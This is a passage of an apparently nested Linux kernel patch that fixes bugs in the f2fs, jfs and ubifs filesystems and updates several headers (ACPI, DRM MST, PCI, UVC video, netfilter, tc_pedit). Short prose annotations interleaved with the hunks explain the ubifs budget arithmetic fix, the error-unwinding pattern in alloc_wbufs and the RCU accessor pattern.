+-			atomic_read(&F2FS_I(inode)->i_compr_blocks));
++			atomic_read(&fi->i_compr_blocks));
+ 
+ 	if (likely(!f2fs_cp_error(sbi) &&
+ 				!is_sbi_flag_set(sbi, SBI_CP_DISABLED)))
+diff --git a/fs/f2fs/iostat.c b/fs/f2fs/iostat.c
+index 3166a8939ed4f..02393c95c9f86 100644
+--- a/fs/f2fs/iostat.c
++++ b/fs/f2fs/iostat.c
+@@ -227,8 +227,12 @@ static inline void __update_iostat_latency(struct bio_iostat_ctx *iostat_ctx,
+ 		return;
+ 
+ 	ts_diff = jiffies - iostat_ctx->submit_ts;
+-	if (iotype >= META_FLUSH)
++	if (iotype == META_FLUSH) {
+ 		iotype = META;
++	} else if (iotype >= NR_PAGE_TYPE) {
++		f2fs_warn(sbi, "%s: %d over NR_PAGE_TYPE", __func__, iotype);
++		return;
++	}
+ 
+ 	if (rw == 0) {
+ 		idx = READ_IO;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index c1d0713666ee5..8d1e8c537daf0 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,14 +192,18 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
+-	if (clean)
+-		truncate_inode_pages_final(inode->i_mapping);
+-	clear_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	iput(fi->cow_inode);
+-	fi->cow_inode = NULL;
+ 	release_atomic_write_cnt(inode);
++	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+ 	stat_dec_atomic_inode(inode);
++
++	F2FS_I(inode)->atomic_write_task = NULL;
++
++	if (clean) {
++		truncate_inode_pages_final(inode->i_mapping);
++		f2fs_i_size_write(inode, fi->original_i_size);
++		fi->original_i_size = 0;
++	}
+ }
+ 
+ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+@@ -250,6 +254,9 @@ retry:
+ 	}
+ 
+ 	f2fs_put_dnode(&dn);
++
++	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
++					index, *old_addr, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -335,10 +342,12 @@ next:
+ 	}
+ 
+ out:
+-	if (ret)
++	if (ret) {
+ 		sbi->revoked_atomic_block += fi->atomic_write_cnt;
+-	else
++	} else {
+ 		sbi->committed_atomic_block += fi->atomic_write_cnt;
++		set_inode_flag(inode, FI_ATOMIC_COMMITTED);
++	}
+ 
+ 	__complete_revoke_list(inode, &revoke_list, ret ? true : false);
+ 
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index eaabb85cb4ddb..14c87399efea2 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1416,8 +1416,6 @@ static int f2fs_drop_inode(struct inode *inode)
+ 			atomic_inc(&inode->i_count);
+ 			spin_unlock(&inode->i_lock);
+ 
+-			f2fs_abort_atomic_write(inode, true);
+-
+ 			/* should remain fi->extent_tree for writepage */
+ 			f2fs_destroy_extent_node(inode);
+ 
+diff --git a/fs/f2fs/verity.c b/fs/f2fs/verity.c
+index c352fff88a5e6..3f4f3295f1c66 100644
+--- a/fs/f2fs/verity.c
++++ b/fs/f2fs/verity.c
+@@ -81,7 +81,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 765838578a722..a3eb1e8269477 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -193,7 +193,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
+-	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG ||
++	    bmp->db_agl2size < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+diff --git a/fs/ubifs/budget.c b/fs/ubifs/budget.c
+index e8b9b756f0aca..d76eb7b39f564 100644
+--- a/fs/ubifs/budget.c
++++ b/fs/ubifs/budget.c
+@@ -209,11 +209,10 @@ long long ubifs_calc_available(const struct ubifs_info *c, int min_idx_lebs)
+ 	subtract_lebs += 1;
+ 
+ 	/*
+-	 * The GC journal head LEB is not really accessible. And since
+-	 * different write types go to different heads, we may count only on
+-	 * one head's space.
++	 * Since different write types go to different heads, we should
++	 * reserve one LEB for each head.
+ 	 */
+-	subtract_lebs += c->jhead_cnt - 1;
++	subtract_lebs += c->jhead_cnt;
+ 
+ 	/* We also reserve one LEB for deletions, which bypass budgeting */
+ 	subtract_lebs += 1;
+@@ -400,7 +399,7 @@ static int calc_dd_growth(const struct ubifs_info *c,
+ 	dd_growth = req->dirtied_page ? c->bi.page_budget : 0;
+ 
+ 	if (req->dirtied_ino)
+-		dd_growth += c->bi.inode_budget << (req->dirtied_ino - 1);
++		dd_growth += c->bi.inode_budget * req->dirtied_ino;
+ 	if (req->mod_dent)
+ 		dd_growth += c->bi.dent_budget;
+ 	dd_growth += req->dirtied_ino_d;
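The dd_growth fix swaps a shift for a multiplication: budget << (n - 1) computes budget * 2^(n-1), not budget * n, so the old code over-charged whenever more than two inodes were dirtied; the two expressions agree only for n = 1 and n = 2, which is why the bug was easy to miss. A quick check:

#include <stdio.h>

int main(void)
{
	unsigned int budget = 100;

	for (unsigned int n = 1; n <= 4; n++)
		printf("n=%u  shift=%-4u  mul=%u\n",
		       n, budget << (n - 1), budget * n);
	/* n=3: 400 vs 300; n=4: 800 vs 400 */
	return 0;
}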
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 0f29cf2011361..5e6bcce94e641 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1151,7 +1151,6 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	int err, sz_change, len = strlen(symname);
+ 	struct fscrypt_str disk_link;
+ 	struct ubifs_budget_req req = { .new_ino = 1, .new_dent = 1,
+-					.new_ino_d = ALIGN(len, 8),
+ 					.dirtied_ino = 1 };
+ 	struct fscrypt_name nm;
+ 
+@@ -1167,6 +1166,7 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	 * Budget request settings: new inode, new direntry and changing parent
+ 	 * directory inode.
+ 	 */
++	req.new_ino_d = ALIGN(disk_link.len - 1, 8);
+ 	err = ubifs_budget_space(c, &req);
+ 	if (err)
+ 		return err;
+@@ -1324,6 +1324,8 @@ static int do_rename(struct inode *old_dir, struct dentry *old_dentry,
+ 	if (unlink) {
+ 		ubifs_assert(c, inode_is_locked(new_inode));
+ 
++		/* Budget for old inode's data when its nlink > 1. */
++		req.dirtied_ino_d = ALIGN(ubifs_inode(new_inode)->data_len, 8);
+ 		err = ubifs_purge_xattrs(new_inode);
+ 		if (err)
+ 			return err;
+@@ -1576,6 +1578,10 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 		return err;
+ 	}
+ 
++	err = ubifs_budget_space(c, &req);
++	if (err)
++		goto out;
++
+ 	lock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 
+ 	time = current_time(old_dir);
+@@ -1601,6 +1607,7 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 	unlock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 	ubifs_release_budget(c, &req);
+ 
++out:
+ 	fscrypt_free_filename(&fst_nm);
+ 	fscrypt_free_filename(&snd_nm);
+ 	return err;
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index f2353dd676ef0..10c1779af9c51 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -1032,7 +1032,7 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 		if (page->index >= synced_i_size >> PAGE_SHIFT) {
+ 			err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 			if (err)
+-				goto out_unlock;
++				goto out_redirty;
+ 			/*
+ 			 * The inode has been written, but the write-buffer has
+ 			 * not been synchronized, so in case of an unclean
+@@ -1060,11 +1060,17 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 	if (i_size > synced_i_size) {
+ 		err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 		if (err)
+-			goto out_unlock;
++			goto out_redirty;
+ 	}
+ 
+ 	return do_writepage(page, len);
+-
++out_redirty:
++	/*
++	 * redirty_page_for_writepage() won't call ubifs_dirty_inode() because
++	 * it passes the I_DIRTY_PAGES flag to __mark_inode_dirty(), so there
++	 * is no need to budget space for the dirty inode here.
++	 */
++	redirty_page_for_writepage(wbc, page);
+ out_unlock:
+ 	unlock_page(page);
+ 	return err;
+@@ -1466,14 +1472,23 @@ static bool ubifs_release_folio(struct folio *folio, gfp_t unused_gfp_flags)
+ 	struct inode *inode = folio->mapping->host;
+ 	struct ubifs_info *c = inode->i_sb->s_fs_info;
+ 
+-	/*
+-	 * An attempt to release a dirty page without budgeting for it - should
+-	 * not happen.
+-	 */
+ 	if (folio_test_writeback(folio))
+ 		return false;
++
++	/*
++	 * Page is private but not dirty, weird? There is one condition
++	 * that makes it happen: ubifs_writepage skipped the page because
++	 * its index is beyond i_size (for example, it was truncated by
++	 * another process, A), and the page is then invalidated by an
++	 * fadvise64 syscall before process A's truncate removes it.
++	 */
+ 	ubifs_assert(c, folio_test_private(folio));
+-	ubifs_assert(c, 0);
++	if (folio_test_checked(folio))
++		release_new_page_budget(c);
++	else
++		release_existing_page_budget(c);
++
++	atomic_long_dec(&c->dirty_pg_cnt);
+ 	folio_detach_private(folio);
+ 	folio_clear_checked(folio);
+ 	return true;
+diff --git a/fs/ubifs/super.c b/fs/ubifs/super.c
+index d0c9a09988bc7..32cb147597960 100644
+--- a/fs/ubifs/super.c
++++ b/fs/ubifs/super.c
+@@ -833,7 +833,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		INIT_LIST_HEAD(&c->jheads[i].buds_list);
+ 		err = ubifs_wbuf_init(c, &c->jheads[i].wbuf);
+ 		if (err)
+-			return err;
++			goto out_wbuf;
+ 
+ 		c->jheads[i].wbuf.sync_callback = &bud_wbuf_callback;
+ 		c->jheads[i].wbuf.jhead = i;
+@@ -841,7 +841,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		c->jheads[i].log_hash = ubifs_hash_get_desc(c);
+ 		if (IS_ERR(c->jheads[i].log_hash)) {
+ 			err = PTR_ERR(c->jheads[i].log_hash);
+-			goto out;
++			goto out_log_hash;
+ 		}
+ 	}
+ 
+@@ -854,9 +854,18 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 
+ 	return 0;
+ 
+-out:
+-	while (i--)
++out_log_hash:
++	kfree(c->jheads[i].wbuf.buf);
++	kfree(c->jheads[i].wbuf.inodes);
++
++out_wbuf:
++	while (i--) {
++		kfree(c->jheads[i].wbuf.buf);
++		kfree(c->jheads[i].wbuf.inodes);
+ 		kfree(c->jheads[i].log_hash);
++	}
++	kfree(c->jheads);
++	c->jheads = NULL;
+ 
+ 	return err;
+ }
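The alloc_wbufs() rework is the usual two-label unwinding shape for loops that initialize each element in stages: on failure, free whatever part of element i was already set up, then walk back over elements 0..i-1 freeing everything, then release the container itself. A generic sketch (hypothetical init_a/init_b helpers):

	for (i = 0; i < n; i++) {
		if (init_a(&elem[i]))
			goto undo_prev;	/* nothing of elem[i] to undo */
		if (init_b(&elem[i]))
			goto undo_a;	/* only part A of elem[i] exists */
	}
	return 0;

undo_a:
	fini_a(&elem[i]);
undo_prev:
	while (i--) {
		fini_b(&elem[i]);
		fini_a(&elem[i]);
	}
	kfree(elem);
	elem = NULL;
	return err;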
+diff --git a/fs/ubifs/sysfs.c b/fs/ubifs/sysfs.c
+index 06ad8fa1fcfb0..54270ad36321e 100644
+--- a/fs/ubifs/sysfs.c
++++ b/fs/ubifs/sysfs.c
+@@ -144,6 +144,8 @@ int __init ubifs_sysfs_init(void)
+ 	kobject_set_name(&ubifs_kset.kobj, "ubifs");
+ 	ubifs_kset.kobj.parent = fs_kobj;
+ 	ret = kset_register(&ubifs_kset);
++	if (ret)
++		kset_put(&ubifs_kset);
+ 
+ 	return ret;
+ }
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 488f3da7a6c6c..2469f72eeaabb 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -267,11 +267,18 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 	if (zbr->len) {
+ 		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+ 		if (unlikely(err))
+-			return ERR_PTR(err);
++			/*
++			 * Obsolete znodes will be freed by tnc_destroy_cnext()
++			 * or free_obsolete_znodes(); copied-up znodes should
++			 * be added back to the tnc and freed by
++			 * ubifs_destroy_tnc_subtree().
++			 */
++			goto out;
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+ 	} else
+ 		err = 0;
+ 
++out:
+ 	zbr->znode = zn;
+ 	zbr->lnum = 0;
+ 	zbr->offs = 0;
+@@ -3053,6 +3060,21 @@ static void tnc_destroy_cnext(struct ubifs_info *c)
+ 		cnext = cnext->cnext;
+ 		if (ubifs_zn_obsolete(znode))
+ 			kfree(znode);
++		else if (!ubifs_zn_cow(znode)) {
++			/*
++			 * Don't forget to update the clean znode count after
++			 * a failed commit, because ubifs checks this count
++			 * while closing the tnc. A non-obsolete znode could
++			 * be re-dirtied during the commit, so the dirty flag
++			 * is not trustworthy. The 'COW_ZNODE' flag is set on
++			 * each dirty znode before committing and cleared once
++			 * the znode becomes clean, so the clean znode count
++			 * can be derived from this flag.
++			 */
++			atomic_long_inc(&c->clean_zn_cnt);
++			atomic_long_inc(&ubifs_clean_zn_cnt);
++		}
+ 	} while (cnext && cnext != c->cnext);
+ }
+ 
+diff --git a/fs/ubifs/ubifs.h b/fs/ubifs/ubifs.h
+index 478bbbb5382f8..2f1f315810949 100644
+--- a/fs/ubifs/ubifs.h
++++ b/fs/ubifs/ubifs.h
+@@ -1623,8 +1623,13 @@ static inline int ubifs_check_hmac(const struct ubifs_info *c,
+ 	return crypto_memneq(expected, got, c->hmac_desc_len);
+ }
+ 
++#ifdef CONFIG_UBIFS_FS_AUTHENTICATION
+ void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
+ 		    const u8 *hash, int lnum, int offs);
++#else
++static inline void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
++				  const u8 *hash, int lnum, int offs) {};
++#endif
+ 
+ int __ubifs_node_check_hash(const struct ubifs_info *c, const void *buf,
+ 			  const u8 *expected);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index ab2d6266038a0..6badc50ec4e66 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -534,6 +534,7 @@ int acpi_bus_update_power(acpi_handle handle, int *state_p);
+ int acpi_device_update_power(struct acpi_device *device, int *state_p);
+ bool acpi_bus_power_manageable(acpi_handle handle);
+ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev);
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev);
+ int acpi_device_power_add_dependent(struct acpi_device *adev,
+ 				    struct device *dev);
+ void acpi_device_power_remove_dependent(struct acpi_device *adev,
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 41fd8352ab656..6c0c3dc3d3aca 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -867,6 +867,9 @@ struct drm_dp_mst_topology_state *
+ drm_atomic_get_mst_topology_state(struct drm_atomic_state *state,
+ 				  struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr);
++struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_atomic_payload *
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index 1611f9db878e7..ca73940e26df8 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -59,7 +59,7 @@ struct xbc_node {
+ /* Maximum size of boot config is 32KB - 1 */
+ #define XBC_DATA_MAX	(XBC_VALUE - 1)
+ 
+-#define XBC_NODE_MAX	1024
++#define XBC_NODE_MAX	8192
+ #define XBC_KEYLEN_MAX	256
+ #define XBC_DEPTH_MAX	16
+ 
+diff --git a/include/linux/mdio/mdio-mscc-miim.h b/include/linux/mdio/mdio-mscc-miim.h
+index 5b4ed2c3cbb9a..1ce699740af63 100644
+--- a/include/linux/mdio/mdio-mscc-miim.h
++++ b/include/linux/mdio/mdio-mscc-miim.h
+@@ -14,6 +14,6 @@
+ 
+ int mscc_miim_setup(struct device *device, struct mii_bus **bus,
+ 		    const char *name, struct regmap *mii_regmap,
+-		    int status_offset);
++		    int status_offset, bool ignore_read_errors);
+ 
+ #endif
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index d8817d381c14b..bef8db9d6c085 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -488,4 +488,9 @@ extern const struct nfnl_ct_hook __rcu *nfnl_ct_hook;
+  */
+ DECLARE_PER_CPU(bool, nf_skb_duplicated);
+ 
++/*
++ * Contains bitmask of ctnetlink event subscribers, if any.
++ * Can't be pernet due to NETLINK_LISTEN_ALL_NSID setsockopt flag.
++ */
++extern u8 nf_ctnetlink_has_listener;
+ #endif /*__LINUX_NETFILTER_H*/
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 2bda4a4e47e81..cb538bc579710 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -570,6 +570,7 @@ struct pci_host_bridge {
+ 	void		*release_data;
+ 	unsigned int	ignore_reset_delay:1;	/* For entire hierarchy */
+ 	unsigned int	no_ext_tags:1;		/* No Extended Tags */
++	unsigned int	no_inc_mrrs:1;		/* No Increase MRRS */
+ 	unsigned int	native_aer:1;		/* OS may use PCIe AER */
+ 	unsigned int	native_pcie_hotplug:1;	/* OS may use PCIe hotplug */
+ 	unsigned int	native_shpc_hotplug:1;	/* OS may use SHPC hotplug */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b362d90eb9b0b..bc8f484cdcf3b 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3012,6 +3012,8 @@
+ #define PCI_DEVICE_ID_INTEL_VMD_9A0B	0x9a0b
+ #define PCI_DEVICE_ID_INTEL_S21152BB	0xb152
+ 
++#define PCI_VENDOR_ID_WANGXUN		0x8088
++
+ #define PCI_VENDOR_ID_SCALEMP		0x8686
+ #define PCI_DEVICE_ID_SCALEMP_VSMP_CTL	0x1010
+ 
+diff --git a/include/media/v4l2-uvc.h b/include/media/v4l2-uvc.h
+index f83e31661333b..b010a36fc1d95 100644
+--- a/include/media/v4l2-uvc.h
++++ b/include/media/v4l2-uvc.h
+@@ -99,6 +99,9 @@
+ #define UVC_GUID_FORMAT_BGR3 \
+ 	{ 0x7d, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
+ 	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
++#define UVC_GUID_FORMAT_BGR4 \
++	{ 0x7e, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
++	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
+ #define UVC_GUID_FORMAT_M420 \
+ 	{ 'M',  '4',  '2',  '0', 0x00, 0x00, 0x10, 0x00, \
+ 	 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71}
+@@ -266,6 +269,11 @@ static struct uvc_format_desc uvc_fmts[] = {
+ 		.guid		= UVC_GUID_FORMAT_BGR3,
+ 		.fcc		= V4L2_PIX_FMT_BGR24,
+ 	},
++	{
++		.name		= "BGRA/X 8:8:8:8 (BGR4)",
++		.guid		= UVC_GUID_FORMAT_BGR4,
++		.fcc		= V4L2_PIX_FMT_XBGR32,
++	},
+ 	{
+ 		.name		= "H.264",
+ 		.guid		= UVC_GUID_FORMAT_H264,
+diff --git a/include/memory/renesas-rpc-if.h b/include/memory/renesas-rpc-if.h
+index 9c0ad64b8d292..ddf94356752d3 100644
+--- a/include/memory/renesas-rpc-if.h
++++ b/include/memory/renesas-rpc-if.h
+@@ -64,24 +64,8 @@ enum rpcif_type {
+ 
+ struct rpcif {
+ 	struct device *dev;
+-	void __iomem *base;
+ 	void __iomem *dirmap;
+-	struct regmap *regmap;
+-	struct reset_control *rstc;
+ 	size_t size;
+-	enum rpcif_type type;
+-	enum rpcif_data_dir dir;
+-	u8 bus_size;
+-	u8 xfer_size;
+-	void *buffer;
+-	u32 xferlen;
+-	u32 smcr;
+-	u32 smadr;
+-	u32 command;		/* DRCMR or SMCMR */
+-	u32 option;		/* DROPR or SMOPR */
+-	u32 enable;		/* DRENR or SMENR */
+-	u32 dummy;		/* DRDMCR or SMDMCR */
+-	u32 ddr;		/* DRDRENR or SMDRENR */
+ };
+ 
+ int rpcif_sw_init(struct rpcif *rpc, struct device *dev);
+diff --git a/include/net/netns/conntrack.h b/include/net/netns/conntrack.h
+index e1290c159184a..1f463b3957c78 100644
+--- a/include/net/netns/conntrack.h
++++ b/include/net/netns/conntrack.h
+@@ -95,7 +95,6 @@ struct nf_ip_net {
+ 
+ struct netns_ct {
+ #ifdef CONFIG_NF_CONNTRACK_EVENTS
+-	u8 ctnetlink_has_listener;
+ 	bool ecache_dwork_pending;
+ #endif
+ 	u8			sysctl_log_invalid; /* Log invalid packets */
+diff --git a/include/net/sctp/structs.h b/include/net/sctp/structs.h
+index 350f250b0dc75..00ee9eb601a6f 100644
+--- a/include/net/sctp/structs.h
++++ b/include/net/sctp/structs.h
+@@ -1409,6 +1409,7 @@ struct sctp_stream_priorities {
+ 	/* The next stream in line */
+ 	struct sctp_stream_out_ext *next;
+ 	__u16 prio;
++	__u16 users;
+ };
+ 
+ struct sctp_stream_out_ext {
+diff --git a/include/net/tc_act/tc_pedit.h b/include/net/tc_act/tc_pedit.h
+index 3e02709a1df65..83fe399317818 100644
+--- a/include/net/tc_act/tc_pedit.h
++++ b/include/net/tc_act/tc_pedit.h
+@@ -4,22 +4,29 @@
+ 
+ #include <net/act_api.h>
+ #include <linux/tc_act/tc_pedit.h>
++#include <linux/types.h>
+ 
+ struct tcf_pedit_key_ex {
+ 	enum pedit_header_type htype;
+ 	enum pedit_cmd cmd;
+ };
+ 
+-struct tcf_pedit {
+-	struct tc_action	common;
+-	unsigned char		tcfp_nkeys;
+-	unsigned char		tcfp_flags;
+-	u32			tcfp_off_max_hint;
++struct tcf_pedit_parms {
+ 	struct tc_pedit_key	*tcfp_keys;
+ 	struct tcf_pedit_key_ex	*tcfp_keys_ex;
++	u32 tcfp_off_max_hint;
++	unsigned char tcfp_nkeys;
++	unsigned char tcfp_flags;
++	struct rcu_head rcu;
++};
++
++struct tcf_pedit {
++	struct tc_action common;
++	struct tcf_pedit_parms __rcu *parms;
+ };
+ 
+ #define to_pedit(a) ((struct tcf_pedit *)a)
++#define to_pedit_parms(a) (rcu_dereference(to_pedit(a)->parms))
+ 
+ static inline bool is_tcf_pedit(const struct tc_action *a)
+ {
+@@ -32,37 +39,81 @@ static inline bool is_tcf_pedit(const struct tc_action *a)
+ 
+ static inline int tcf_pedit_nkeys(const struct tc_action *a)
+ {
+-	return to_pedit(a)->tcfp_nkeys;
++	struct tcf_pedit_parms *parms;
++	int nkeys;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	nkeys = parms->tcfp_nkeys;
++	rcu_read_unlock();
++
++	return nkeys;
+ }
+ 
+ static inline u32 tcf_pedit_htype(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].htype;
++	u32 htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	struct tcf_pedit_parms *parms;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		htype = parms->tcfp_keys_ex[index].htype;
++	rcu_read_unlock();
+ 
+-	return TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	return htype;
+ }
+ 
+ static inline u32 tcf_pedit_cmd(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].cmd;
++	struct tcf_pedit_parms *parms;
++	u32 cmd = __PEDIT_CMD_MAX;
+ 
+-	return __PEDIT_CMD_MAX;
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		cmd = parms->tcfp_keys_ex[index].cmd;
++	rcu_read_unlock();
++
++	return cmd;
+ }
+ 
+ static inline u32 tcf_pedit_mask(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].mask;
++	struct tcf_pedit_parms *parms;
++	u32 mask;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	mask = parms->tcfp_keys[index].mask;
++	rcu_read_unlock();
++
++	return mask;
+ }
+ 
+ static inline u32 tcf_pedit_val(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].val;
++	struct tcf_pedit_parms *parms;
++	u32 val;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	val = parms->tcfp_keys[index].val;
++	rcu_read_unlock();
++
++	return val;
+ }
+ 
+ static inline u32 tcf_pedit_offset(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].off;
++	struct tcf_pedit_parms *parms;
++	u32 off;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	off = parms->tcfp_keys[index].off;
++	rcu_read_unlock();
++
++	return off;
+ }
+ #endif /* __NET_TC_PED_H */
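With the pedit parameters moved behind an __rcu pointer, each accessor above takes rcu_read_lock(), dereferences parms, copies out the one field it needs, and unlocks, since the block can be replaced and freed after a grace period at any moment. The matching writer side lives in act_pedit itself, not in this header; a plausible sketch of the update path (an assumption, not shown in this hunk):

	struct tcf_pedit_parms *oparms;

	spin_lock_bh(&p->tcf_lock);
	oparms = rcu_replace_pointer(p->parms, nparms,
				     lockdep_is_held(&p->tcf_lock));
	spin_unlock_bh(&p->tcf_lock);

	if (oparms)
		kfree_rcu(oparms, rcu);	/* freed only after all readers exit */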
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index ff57e7f9914cc..e57f867191ef1 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -1286,6 +1286,43 @@ DEFINE_EVENT(f2fs__page, f2fs_vm_page_mkwrite,
+ 	TP_ARGS(page, type)
+ );
+ 
++TRACE_EVENT(f2fs_replace_atomic_write_block,
++
++	TP_PROTO(struct inode *inode, struct inode *cow_inode, pgoff_t index,
++			block_t old_addr, block_t new_addr, bool recovery),
++
++	TP_ARGS(inode, cow_inode, index, old_addr, new_addr, recovery),
++
++	TP_STRUCT__entry(
++		__field(dev_t,	dev)
++		__field(ino_t,	ino)
++		__field(ino_t,	cow_ino)
++		__field(pgoff_t, index)
++		__field(block_t, old_addr)
++		__field(block_t, new_addr)
++		__field(bool, recovery)
++	),
++
++	TP_fast_assign(
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->cow_ino	= cow_inode->i_ino;
++		__entry->index		= index;
++		__entry->old_addr	= old_addr;
++		__entry->new_addr	= new_addr;
++		__entry->recovery	= recovery;
++	),
++
++	TP_printk("dev = (%d,%d), ino = %lu, cow_ino = %lu, index = %lu, "
++			"old_addr = 0x%llx, new_addr = 0x%llx, recovery = %d",
++		show_dev_ino(__entry),
++		__entry->cow_ino,
++		(unsigned long)__entry->index,
++		(unsigned long long)__entry->old_addr,
++		(unsigned long long)__entry->new_addr,
++		__entry->recovery)
++);
++
+ TRACE_EVENT(f2fs_filemap_fault,
+ 
+ 	TP_PROTO(struct inode *inode, pgoff_t index, unsigned long ret),
+diff --git a/include/uapi/linux/usb/video.h b/include/uapi/linux/usb/video.h
+index bfdae12cdacf8..c58854fb7d94a 100644
+--- a/include/uapi/linux/usb/video.h
++++ b/include/uapi/linux/usb/video.h
+@@ -179,6 +179,36 @@
+ #define UVC_CONTROL_CAP_AUTOUPDATE			(1 << 3)
+ #define UVC_CONTROL_CAP_ASYNCHRONOUS			(1 << 4)
+ 
++/* 3.9.2.6 Color Matching Descriptor Values */
++enum uvc_color_primaries_values {
++	UVC_COLOR_PRIMARIES_UNSPECIFIED,
++	UVC_COLOR_PRIMARIES_BT_709_SRGB,
++	UVC_COLOR_PRIMARIES_BT_470_2_M,
++	UVC_COLOR_PRIMARIES_BT_470_2_B_G,
++	UVC_COLOR_PRIMARIES_SMPTE_170M,
++	UVC_COLOR_PRIMARIES_SMPTE_240M,
++};
++
